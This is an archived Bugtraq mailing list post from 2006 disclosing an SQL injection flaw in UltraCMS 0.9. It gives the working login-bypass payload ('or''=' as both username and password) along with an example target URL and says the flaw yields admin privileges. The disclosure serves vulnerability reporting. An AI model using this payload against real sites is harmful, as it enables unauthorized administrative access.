Bugtraq mailing list archives
UltraCMS 0.9 sql injection
From: fireboy2006 () gmail com
Date: 19 Oct 2006 01:03:09 -0000
**************************** * Tunis the 18 October 2006* * bug found by fireboy * **************************** product:UltraCMS 0.9 there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges. exploit: user: 'or''=' pass: 'or''=' example : http://www.target.com/include/index.php thx
Current thread:
- UltraCMS 0.9 sql injection fireboy2006 (Oct 19)